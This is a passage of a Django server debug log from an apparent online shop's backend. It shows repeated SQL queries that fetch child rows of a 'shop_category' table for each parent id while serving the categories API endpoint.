"shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:22:44,032 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:22:44,037 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:22:44,042 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:22:44,046 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:22:44,050 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:22:44,056 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:22:44,060 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:22:44] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-13 14:24:54,075 utils 20136 140506667599616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:24:54,088 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:24:54,096 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:24:54,101 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:24:54,108 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:24:54,113 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:24:54,117 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:24:54,123 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:24:54,128 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:24:54,134 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:24:54,138 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:24:54,142 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:24:54,147 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:24:54,150 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:24:54,155 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:24:54,159 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:24:54,165 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 14:24:54,169 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:24:54,174 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:24:54,181 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:24:54,186 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:24:54,190 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:24:54,195 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:24:54,199 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:24:54,203 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:24:54,211 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:24:54,215 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:24:54,220 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:24:54,224 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:24:54,229 utils 20136 140506667599616 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:24:54,233 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:24:54,236 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:24:54,239 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:24:54,242 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:24:54,246 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:24:54,253 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:24:54,258 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:24:54,262 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:24:54,267 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:24:54,271 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:24:54,276 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:24:54,281 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:24:54,286 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:24:54,289 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:24:54,294 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:24:54,298 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:24:54] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-13 14:26:20,675 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:26:20,682 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:26:20,686 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:26:20,688 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:26:20,691 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:26:20,695 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:26:20,698 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:26:20,701 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:26:20,705 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:26:20,708 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:26:20,711 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:26:20,714 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:26:20,716 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:26:20,719 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY 